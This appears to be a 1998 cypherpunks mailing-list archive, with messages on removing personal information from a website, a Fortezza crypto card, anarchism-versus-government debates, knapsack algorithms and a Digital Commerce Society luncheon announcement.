Vladimir Z. Nuri   Thu Nov 12 21:25  247/11048 IP: ISPI Clips 6.33: Pate
Vladimir Z. Nuri   Sun Nov 15 22:02 107/4502  "IP: Text: Clinton Continues Nat'l Emergency on W"
Vladimir Z. Nuri   Sun Nov 15 22:02 199/8908  "IP: ISPI Clips 6.38: NAI [PGP] FlipFlop Back to "
Vladimir Z. Nuri   Sun Nov 15 22:04 247/11875 "IP: ISPI Clips 6.37: Privacy Group Pushes For He"
Vladimir Z. Nuri   Sun Nov 15 22:17 117/5653  "IP: U.S. Must Re-Think Strategy to Counter WMD T"
Vladimir Z. Nuri   Sun Nov 15 22:28 135/6239  "IP: Stranger than fiction...."
Vladimir Z. Nuri   Sun Nov 15 22:31 167/6675  "IP: Wired News: Y2Kaboom?"
Vladimir Z. Nuri   Sun Nov 15 22:49 165/7151  "IP: [FP] Governors push national ID plan - WND"
Vladimir Z. Nuri   Sun Nov 15 23:21 189/9276  "IP: Meteorites swarming toward us"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burton <webmaster@starloop.com>
Date: Tue, 17 Nov 1998 13:46:07 +0800
To: Bill Stewart <cypherpunks@toad.com>
Subject: Re: Privacy and the internet
In-Reply-To: <199811140949.BAA21751@toad.com>
Message-ID: <Version.32.19981116230046.00e6ab60@mail.starloop.com>
MIME-Version: 1.0
Content-Type: text/plain



Something I can tell you about this..

My name is Jason Burton; and this is the URL :
http://exchange.worldaccessnet.com/dmca/narc.html 
that is posting the information..

Now, if that were you, what would you do?

Thanks

I'd appreciate any help...
Jason Burton - webmaster@starloop.com
PGP FINGERPRINT: 29B3 C18B 233E 7666 6BCF  E9BF E5A4 CD93 C6E6 A77B



At 02:57 PM 11/15/98 -0800, you wrote:
>At 04:46 AM 11/14/98 -0500, Jason Burton wrote:
>>Does anyone know what I should do if someone was posting sensitive
>>information on a website?
>>And what if the webmaster of the domain doesnt respond to the request for
>>removal of information.
>>IS there something that say's what is and isn't able to be published
>>"personal information" on the internet.
>>If someone can reply I'd appreciate it.
>>Seeking council.
>
>They don't call this The Net Of A Million Lies for nothing :-)
>
>Depends substantially on what kind of information it is,
>what jurisdictions you, the web site, and the poster are in,
>and whether you're interested in seeking legal counsel
>as well as just hacker advice.  IANAL, but there are a range
>of torts from libel or slander to invasion of privacy to
>emotional distress that sometimes apply, if you're into
>that sort of approach; if the person the information is about
>is a public figure, this seldom works, and if the information
>is true, you've also got a much more limited case.
>
>Alternatively, there's the Big Gun Flame War approach of 
>making sure everyone knows what an unresponsive loser the 
>web site providers are, though that does lose the opportunity to quietly 
>get the information to go away, even if it hasn't already been
>sucked down by Altavista, Yahoo, Hotbot, and DejaNews.
>
>Most web sites are either on big commercial hosting sites with
>relatively responsive abuse@wherever contacts, or else they're
>smaller sites which get connectivity and/or hosting service
>from larger providers.  So find out who their upstream providers are,
>and talk with them about their customer.  
>				Thanks! 
>					Bill
>Bill Stewart, bill.stewart@pobox.com
>PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hurley bryan <bhurle1@gl.umbc.edu>
Date: Tue, 17 Nov 1998 18:09:18 +0800
To: cypherpunks@toad.com
Subject: Does anyone have FTP acess to Litronic.com?
Message-ID: <Pine.SGI.3.96A.981117042055.15768D-100000@umbc9.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain




I just picked up a Moniker Crypto Card, made by Litronic, Fortezza
Compliant, PCMCIA v2.1 type 2 card. Seems all the software went behind a
$600month, 6mo min, ftp site as of oct 1, 1998.

I don't want to seem like a warez d00d, I am looking for software to use
this card, or further info, but may be up the river.

Its a risc processor in a card to do fast crypto and store info on it.

Thanks
Bryan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Tue, 17 Nov 1998 20:05:37 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Expect the expected
Message-ID: <36516202.3AA7EE66@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain


While visiting the Goddard Space Flight Center's website at
http://pao.gsfc.nasa.gov/gsfc.html
(for some Leonid lowdown), you are given an antiMiranda inoculation and
subjected to a full cavity body search:

U.S. GOVERNMENT COMPUTER If not authorized to access
this system, disconnect now. YOU SHOULD HAVE NO EXPECTATION OF PRIVACY
By continuing, you consent to your keystrokes and data content being monitored.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Tue, 17 Nov 1998 19:25:32 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Question about anarchic systems and natural disasters (fwd)
In-Reply-To: <000401be11e0$df151580$368195cf@blanc>
Message-ID: <3651632E.E0474BB@workmail.com>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3998.1071713817.multipart/signed"

--Boundary..3998.1071713817.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Blanc wrote:
> 
> >From Jim Choate:
> 
> : The question was how would an anarchic system work in this respect, not how
> : do governments, relief organizations, and the general public act now.
> ................................................
> 
> The answer is that you cannot know in advance.   Since anarchies are not formal
> societies, there would exist no centralized formal structures, so therefore such
> behavior cannot be predicted.   Responses to emergeny situations would depend
> upon the psychology of those who are living in anarchy.  Predicting how they
> would "work", when no one is coerced to function, requires imagining the
> potential for normal responses available to those who are free from remote
> control, who can decide for themselves whether they care, and what they're going
> to do about it, if anything.
> 



Simple,  they would work anarchically.  If the guy whose house is
burning down is an assh*le, then let it burn.

Somewhen in the last 50 odd years, equality of opportunity (to not be an
assh*le), got confused with egalitarianism (all 
people get the same treatment, assh*les included).

Anarchy is admitting that egalitarianism can never work without
promoting assh*lism.

--Boundary..3998.1071713817.multipart/signed
Content-Type: application/octet-stream; name="bin00003.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00003.bin"
Content-Description: "S/MIME Cryptographic Signature"

MIIIogYJKoZIhvcNAQcCoIIIkzCCCI8CAQExCzAJBgUrDgMCGgUAMAsGCSqG
SIb3DQEHAaCCBkAwggLwMIICWaADAgECAgIiCjANBgkqhkiG9w0BAQQFADCB
yDELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTEUMBIGA1UE
BxMLRHVyYmFudmlsbGUxGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5nMTMw
MQYDVQQLEypDZXJ0aWZpY2F0ZSBTZXJ2aWNlcyBSU0EgSUsgMTk5OC4yLjI1
IDg6MzUxOzA5BgNVBAMTMlRoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBSU0Eg
SXNzdWluZyBLZXkgMTk5OC4yLjI1MB4XDTk4MDUwMTE0MzEzMFoXDTk5MDUw
MTE0MzEzMFowWTEzMDEGA1UEAxYqVGhhd3RlIEZyZWVtYWlsIE1lbWJlciBz
b3JlbnNAd29ya21haWwuY29tMSIwIAYJKoZIhvcNAQkBFhNzb3JlbnNAd29y
a21haWwuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/Glch6AWt
vdTCMryo76FdpbCFjxl1YhIaMP+Ys/StMsCYtwGcNTsRqyGqwGMV6r2ZmPYa
Y6Veb7cPuEOsrN9OHuDiv/285Ip40sdsQD2eUEKVQoMNrUevkwxFCnFzFF5C
JHvvfVNkPw8Pl9up8hMNkSpNUdZM5hy5+zjFwrWQ5wIDAQABo1cwVTAUBglg
hkgBhvhCAQEBAf8EBAMCBaAwDgYDVR0PAQH/BAQDAgWgMAwGA1UdEwEB/wQC
MAAwHwYDVR0jBBgwFqAU7TQXbg4rXkuHmJG4N6eYv5IfrHIwDQYJKoZIhvcN
AQEEBQADgYEAAbA+57BV6kVH6veZ3HPtOFaO3yd3l3p3mWqECTLjxVp4tjpJ
QS26rBjmlzRk8Zzohb86bZ7zN74JnowlYJscmwwtP7tvy0B2gKDRkjN360HC
ySLXA8J7Ys2U+U2TgxTpgK1gbxfBw9jNoigvvq2gTWT5WtYG93TLgoaF/EV1
7SowggNIMIICsaADAgECAgEIMA0GCSqGSIb3DQEBBAUAMIHRMQswCQYDVQQG
EwJaQTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRv
d24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5nMSgwJgYDVQQLEx9DZXJ0
aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtUaGF3dGUg
UGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFs
LWZyZWVtYWlsQHRoYXd0ZS5jb20wHhcNOTgwMjI1MDgzNTMzWhcNMDAwMjI1
MDgzNTMzWjCByDELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2Fw
ZTEUMBIGA1UEBxMLRHVyYmFudmlsbGUxGjAYBgNVBAoTEVRoYXd0ZSBDb25z
dWx0aW5nMTMwMQYDVQQLEypDZXJ0aWZpY2F0ZSBTZXJ2aWNlcyBSU0EgSUsg
MTk5OC4yLjI1IDg6MzUxOzA5BgNVBAMTMlRoYXd0ZSBQZXJzb25hbCBGcmVl
bWFpbCBSU0EgSXNzdWluZyBLZXkgMTk5OC4yLjI1MIGfMA0GCSqGSIb3DQEB
AQUAA4GNADCBiQKBgQDHMcPEG5kjctJRhZVM41mS5OhsgbX0G18J5sSts0Rv
qjjXV+Swxcu6dK5MYSMkdgb42V0NiiiytCvtDbtSJPS3xUmng2P8CgSw74Eo
9+aRxk2X7pJ2JmLIYzd2PLGSD9ytUgaKccU3MWqG270IaShZ/O3HfSZn3U3e
08UC/ne24QIDAQABozcwNTASBgNVHRMBAf8ECDAGAQH/AgEAMB8GA1UdIwQY
MBagFHJJwnM0xlX0C3ZygX539IfnxrIOMA0GCSqGSIb3DQEBBAUAA4GBAELq
7YthfqHUXFKpPL2enHnoCYsSga2PHVpG7fElJlvIrv16IRbNoB47lzOD+043
KiiXpkj1KBgCJHyAe1NQtftvmvxtqlwmRagvNiJY0xsCAx/ulDnw/jRaiEsb
PYzz137Tn3BbdvbYxOK2PCSdCSWMWbHUi/P8BIIOnimGbMX/MYICKjCCAiYC
AQEwgc8wgcgxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUx
FDASBgNVBAcTC0R1cmJhbnZpbGxlMRowGAYDVQQKExFUaGF3dGUgQ29uc3Vs
dGluZzEzMDEGA1UECxMqQ2VydGlmaWNhdGUgU2VydmljZXMgUlNBIElLIDE5
OTguMi4yNSA4OjM1MTswOQYDVQQDEzJUaGF3dGUgUGVyc29uYWwgRnJlZW1h
aWwgUlNBIElzc3VpbmcgS2V5IDE5OTguMi4yNQICIgowCQYFKw4DAhoFAKCB
sTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw05
ODExMTcxMTUxMTVaMCMGCSqGSIb3DQEJBDEWBBSA4/Mi8EXxtBz75YKdx0k0
3yo8SDBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMC
AgIAgDAHBgUrDgMCBzANBggqhkiG9w0DAgIBQDANBggqhkiG9w0DAgIBKDAN
BgkqhkiG9w0BAQEFAASBgED9oLnzrjajWTOUyNkxT5U7USsH1QIX2kSWZUpJ
Ygurnae+W2B/RVTci2qyerPjrjHIjQvANMolrbUke4Nm3w6Ct3omvzG8m7aQ
iM1TDMy7S3dvN4b3q6s3BQn7EKFPFwJ9QI0DNVA2DEdFmdKAujKQDG5Ovu1v
U88+9KbpmFjn
--Boundary..3998.1071713817.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 17 Nov 1998 21:51:50 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed (fwd)
Message-ID: <199811171319.HAA14962@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 16 Nov 1998 17:53:29 -0500
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed (fwd)

> >State regulation on speech, press, etc. are also completely constitutional
> 
> The 14th supersedes this somewhat; states can't violate 
> federal-constitutional rights in ways that they could before it
> when they had the 10th to permit them.

Where? Speech is a right not an immunity or privilige and the 14th doesn't
extend a single right only federaly mandated immunities and priviliges.

That is unless you're willing to let your rights become priviliges or
immunities given by the federal government. Not exactly what a right started
out to be.

The 14th is great spin-doctor bull-shit.

> Some freedom of choice - if you don't like what the government forces 
> on you, move.  "Democracy" means that if 50% of the people
> vote for a system like that, you're stuck with it.

Actualy ours requires 75%.

> Now, it's certainly better than systems like serfdom or Sovietism,
> where you weren't allowed to move either, and it's also better
> to have non-homogeneity available nearby.

True, but this is confusing a particular implimentation (however flawed)
with the principles behind it. Not the most accurate representation.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 17 Nov 1998 21:51:54 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811171328.HAA15035@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 16 Nov 1998 17:36:49 -0500
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)

> At 10:38 AM 11/10/98 -0600, Jim Choate wrote:
> >Your right, let me spell it out. Free-markets as depicted by
> >anarcho-whatever theories legitimize theft, physical violence, extortion, etc.
> 
> Nonsense.  Governments are the ones who claim legitimacy for
> their theft, violence, and extortion.

Nonsense, in this country the people chose to give the federal government
specific duties in regards violence and when it could be used and how. It's
nowhere near as one-sided as you would have anyone believe.

>  Free markets consider those things
> to be bad, though in some free markets they're for sale anyway.

I find NOTHING in free-market theory that says violence is bad let alone
that it won't be prevelant. I hear a lot of folks claim this is the natural
result but then again, that's what Trotsky and his ilk did back at the
beginning of this century.

Simply claiming something about a potential system is not the same as
demonstrating that it actualy works that way.

> Nonsense again.  Social institutions aren't a market issue,

They are if they impact what people do with their income. Simply saying that
we're going to ignore the political and economic impact of a sector of human
indeavour simply because it doesn't if within a nice little chart is a
disservice.

> though some services provided by them can also be provided by markets,
> i.e. hiring people to do things.  They're a social issue, and 
> people will form social institutions to do things if they want.

Which takes money and time which has to come and go somewhere.

> Absence of coercion doesn't mean absence of cooperation.

Please demonstrate what about anarchy will coerce (there is no other term)
individuals to do what is best for their neighbor. In the process you will
need to demonstrate as well why other systems prevent or prohibit such
expression currently.

> Anarchists are perfectly good at having schools, churches,
> volunteer fire companies, theater groups, and soup kitchens,
> and they still raise their kids, live inside if they want,

If taken as individual instances, trying to argue from the specific to the
general in this case raises a whole can of worms that none of you are
answering, though I must admit some very nifty side-steps.

> Just because you don't have a social institution that announces
> that it has the job of killing anybody who competes with it or
> fails to obey its proclamations of the will of the majority
> doesn't mean you don't have social institutions.

Nobody claimed that Bill, straw-man.

> You've sure got the cart before the horse here.
> Most anarchists I know, whether leftists or libertarians,
> care more about justice and equity than any government
> I've encountered (maybe not more than the citizens
> ruled by the government, but more than the government itself.)
> We just don't think a State is a good or likely way to get them,
> given too much experience to the contrary, even if some occasional
> groups of people have some limited success running a limited government
> for short periods of time.

Explain how it works, it's that simple (and repeated for about the umpteenth
time).

I find another aspect of anarchism pretty interesting, that is the level of
cooperation and homogeneity it would require for people to work together.
They have to give up various expressions of their religions and personal
beliefs in order to participate, othewise they let the assholes house burn
or whatever.

Sounds suspicously like socialism where each person is expected to
participate and produce according to the good of the many.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 17 Nov 1998 22:12:42 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Some interesting computational articles [/.]
Message-ID: <199811171338.HAA15187@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://slashdot.org/

>     Linux at Supercomputing '98 Linux Posted by sengan on Monday November
>    16, @03:14PM
>    from the where-we-kick-ass dept.
>    John A. Turner writes "Haven't seen anything on /. about how much
>    Linux-related stuff there was at Supercomputing '98 so thought I'd
>    mention it. One of the best things was a panel discussion titled
>    "Clusters, Extreme Linux, and NT". There's a nice summary of the
>    Linux-related events at SC '98 at the Extreme Linux site " Note that
>    reactions to Red Hat's support options announcements included One area
>    in which Linux is far ahead of the pack is clustering. Has any
>    participant written up a summary we could post? Update Rahul Dave has
>    written a report for us.
>    Read More...
>    18 comments

>     Chaos in the Machine Science Posted by CmdrTaco on Monday November
>    16, @02:19PM
>    from the science-is-cool dept.
>    carter writes "It appears Georgia Institute of Technology & Sudeshna
>    Sinha of the Institute of Mathematical Science in Madras, India,
>    published the first design for a chaotic computer. Such computers
>    could in theory could preform trillions of operations a second. Think
>    of how fast your kernels will compile with one of those things. :-) "
>    Read More...
>    28 comments

>     Overview, Chip challange and Progress Hardware Posted by CmdrTaco on
>    Monday November 16, @10:45AM
>    from the stuff-to-read dept.
>    J Widjaja writes "Infoworld carries an article which describe recent
>    advances and challange on chip technology. This article gives nice
>    overview of chip industry direction."
>    Read More...
>    11 comments


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 17 Nov 1998 23:56:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811171524.JAA15577@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 17 Nov 1998 16:17:12 +0100
> From: Anonymous <nobody@replay.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)

> This is the central disconnect between you and the other side.  You
> obviously have as a core assumption that people should be /required/
> to do what is best for their neighbor.

Not even close junior.

> Most anarchists would reject that assumption.

As would I.

>  Instead, an anarchist would say "The best thing I
> can do for my neighbor (and the only thing I 'owe' him) is to leave
> him alone."  That is, I have no affirmative obligation to do anything
> for my neighbor to make his life better.

You also have no right to do anything to make their life worse either.

THAT is my objection to anarchism, it has zero, nada, null, nul, nil,
none, zipo recognition of others peoples rights and an individuals
responsibility to respect them.

It further refuses to recognize that to help others is to help oneself in
many cases.

Get your facts straight (but that's probably asking too much).


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: staym@accessdata.com
Date: Wed, 18 Nov 1998 03:08:52 +0800
To: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Subject: Re: 0/1 knapsack
In-Reply-To: <Pine.GSO.3.96.981116124934.27971A-100000@mudspring.uplb.edu.ph>
Message-ID: <3651B9D4.6061@accessdata.com>
MIME-Version: 1.0
Content-Type: text/plain



A knapsack is a container that can only hold so much of something.  You
have a collection of objects with a weight and/or volume and a value. 
You want to maximize the value.  Fractional knapsack problems concern
things like flour and sugar, that you can measure out a fractional unit
of.  In 0/1 knapsack problems, you have a collection of objects: either
you put in the TV or you don't; no half-TV's.

Quoting from _Introduction to Algorithms_ (Cormen, Leiserson, & Rivest),
'Dynamic programming, like the divide-and-conquer method, solves
problems by combining the solutions to subproblems. ("Programming" in
this context refers to a tabular method, not to writing computer code.)
... Divide-and-conquer algorithms partition the problem into independant
subproblems, solve the problems recursively, and then combine their
solutions to solve the original problem.  In contrast, dynamic
programming is applicable when the subproblems are not independent..."
-- 
Mike Stay
Cryptographer / Programmer
AccessData Corp.
mailto:staym@accessdata.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: staym@accessdata.com
Date: Wed, 18 Nov 1998 03:08:17 +0800
To: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Subject: Re: 0/1 knapsack
In-Reply-To: <Pine.GSO.3.96.981116124934.27971A-100000@mudspring.uplb.edu.ph>
Message-ID: <3651BA33.7DBF@accessdata.com>
MIME-Version: 1.0
Content-Type: text/plain



P.S. If you're considering writing a cipher based on them, don't.  Every
knapsack-based encryption algorithm has been broken.
-- 
Mike Stay
Cryptographer / Programmer
AccessData Corp.
mailto:staym@accessdata.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 18 Nov 1998 04:01:06 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811171915.NAA16466@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 17 Nov 1998 14:00:53 -0500
> From: Michael Hohensee <mah248@nyu.edu>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)

> > > Just because you don't have a social institution that announces
> > > that it has the job of killing anybody who competes with it or
> > > fails to obey its proclamations of the will of the majority
> > > doesn't mean you don't have social institutions.
> > 
> > Nobody claimed that Bill, straw-man.
> 
> Now wait a minute, which side was it that said that an "anarchistic
> society" was an oxymoron?

It wasn't me, I said it was axiomaticaly contradictory.

A oxymoron is two terms with contradictory meaning used together (eg
deafening silence).

  You know, that we can't have a society
> without a state?

Than anarchy is sooooo screwed.

  The state is nothing but an organization which kills
> anyone who doesn't obey its will (however that will is determined, or
> however many orders it will give you before disobedience is fatal).

That's your rather self-serving definition. A state, used as a synonym for
government, has a much broader group of responsiblities.

  By
> saying this, you *are* saying that it is necessary to "have a social
> institution that announces that it has the job of killing anybody who
> competes with it or fails to obey its proclamations of the will of the
> majority" in order to have *any* social institutions (i.e., to have a
> society).

Demostrate please. I have not said, nor said anything that implies that. I
have said that people have a right to self defence and as an extension the
need of armies and other such institutions are an extension of that. I also
believe that police should exist and should have the responsibility to use
deadly force, just not in as many instances as now.

Anarchist would leave it to the individual to decide, a bad precidence.

> *We* weren't the ones who raised that strawman. ;)

No, *YOU* are exactly the ones who raised it.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Wed, 18 Nov 1998 04:36:39 +0800
To: mah248@nyu.edu>
Subject: RE: Question about anarchic systems and natural disasters (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8596@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Michael Hohensee wrote:

> Anonymous wrote:
>> Soren writes:
>> > Simple,  they would work anarchically.  If the guy whose house is
>> > burning down is an assh*le, then let it burn.
>> Now you know why Choate fears anarchy.
>Fortunately for the alleged assh*le, there are likely lots of people
>(i.e. _firemen_) who are willing to come and put out his fire, if Mr.
>assh*le has contracted with them or someone else who has in turn
>contracted with them.  If they didn't, they would be marked (correctly)
>assh*les, and nobody would contract with them anymore, and they'd get
>real poor real fast.
>Michael Hohensee

No-one's yet noticed that my Jim's house burning down is a problem for
his neighbours.  Not just for the fear and distress it causes them but
because the fire might spread to their houses.  Which is why we have
fire brigades. And why they are nearly always paid for out of tax.
Almost the last thing in the world anyone does privately.  

Of course, that applies to cities, not to the country - but cities are
where it's at. 

Ken Brown.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 18 Nov 1998 03:51:02 +0800
To: cypherpunks@cyberpass.net
Subject: DCS-NY: Dec. 15 Meeting: Win Treese of Open Market
Message-ID: <v04020a18b2777300de1d@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: dcs-ny-announce@piermont.com
To: "recipient list suppressed" <perry@piermont.com>
Subject: DCS-NY: Dec. 15 Meeting: Win Treese of Open Market
Reply-To: dcs-ny-rsvp@piermont.com
Mime-Version: 1.0 (generated by tm-edit 7.108)
From: "Perry E. Metzger" <perry@piermont.com>
Date: 17 Nov 1998 12:54:49 -0500
Lines: 110
Sender: owner-dcs-ny-announce@piermont.com


[If you know of people who may be interested in this meeting, please
feel free to forward this message to them.]

The next luncheon meeting of the Digital Commerce Society of New
York (DCS-NY), will be held on Tuesday, December 15th at 12:00. If you
are interested in attending, please RSVP and send in your check (as
explained below) as soon as possible. [Note: This month, DCS-NY will
be on the third Tuesday of the month, not the second, because of
scheduling conflicts.]

This Month's Luncheon Talk:

	        Does Internet Commerce Really Need a PKI?
			        Win Treese
		       Corporate Systems Architect
			    Open Market, Inc.
			  treese@openmarket.com

  It is now commonplace to claim that a "good PKI" [Public Key
  Infrastructure] is the technology that will enable the widespread
  growth of Internet commerce. But what does Internet commerce need
  from a PKI? Based on our experiences with many kinds of businesses,
  we will examine some of the real-world security requirements and how
  public-key systems may be appropriate or inappropriate solutions to
  those problems.

  Win Treese is Corporate Systems Architect at Open Market, Inc.,
  (http://www.openmarket.com) a leading vendor of software for Internet
  commerce. At Open Market, he has worked on many different products
  and systems, with a particular focus on security for commerce applications.
  He has previously worked at Digital Equipment Corporation's Cambridge
  Research Lab and at MIT's Project Athena. He is co-author of the book
  "Designing Systems for Internet Commerce" (http://www.treese.org/Commerce).
  In addition, he chairs the IETF Working Group on Transport Layer
  Security (TLS), and is program chair for the 8th USENIX Security Symposium
  (http://www.usenix.org/events/sec99/).


WHAT IS DCS-NY?

The Digital Commerce Society of New York (DCS-NY) is a spin-off of
DCS-Boston (DCSB).  We meet once a month for lunch at the Harvard Club
of New York -- usually on the second Tuesday of the month -- to
explore the implications of rapidly emerging internet and
cryptographic technologies on finance and commerce.

If you are interested in attending our next luncheon meeting, please
follow the directions located below. If you merely wish to be added to
our e-mail meeting announcements list, you may send your e-mail
address to "dcs-ny-rsvp@piermont.com".


Perry

PS We would like to thank John McCormack for his invaluable assistance in
procuring the venue for our meetings.

----------------------------------------------------------------------

HOW TO RSVP:

The meeting will start at 12:00 noon on December 15th at the Harvard Club,
which located at 27 West 44th St. in Manhattan.

The cost of the luncheon is $49.00.

To RSVP, please:
A) Send a check for $49.00 (payable to "The Harvard Club of New York") to:

	Harry S. Hawk
	DCS-NY LUNCHEON
	Piermont Information Systems, Inc.
	175 Adams St., #9G
	Brooklyn, New York  11201

Please include along with your check:
1) The name of the person attending
2) Their daytime phone number
3) Their e-mail address

B) Send an email message to dcs-ny-rsvp@piermont.com indicating that
you have sent your check. The receipt of your check is your actual RSVP.
We use the email to insure that nothing gets lost in the mail. You will
get email from us once the check is received.

Making final arrangements for our room requires that we have a good
idea of how many attendees we will have. Because of this, it is very
important that you RSVP quickly so that we will be able to get a
larger room if necessary. All checks must be received no later than
Friday December 11th. If you are uncertain that your check will arrive
by the correct date, please use a messenger or express mail service.

The late fee is $75 per person paid with a corporate check or money
order. We will always try to accommodate everyone we can, even at the
last minute. However, we can not guarantee that those who have not
RSVPed will be seated. *Please* try to RSVP.

Please note that the Harvard Club dress code requires jacket and tie
for men and comparable attire for women.

If you have special dietary requirements, please check with us by
email before you RSVP.

We are looking forward to seeing you!

----------------------------------------------------------------------


Perry

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Wed, 18 Nov 1998 03:42:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Question about anarchic systems and natural disasters (fwd)
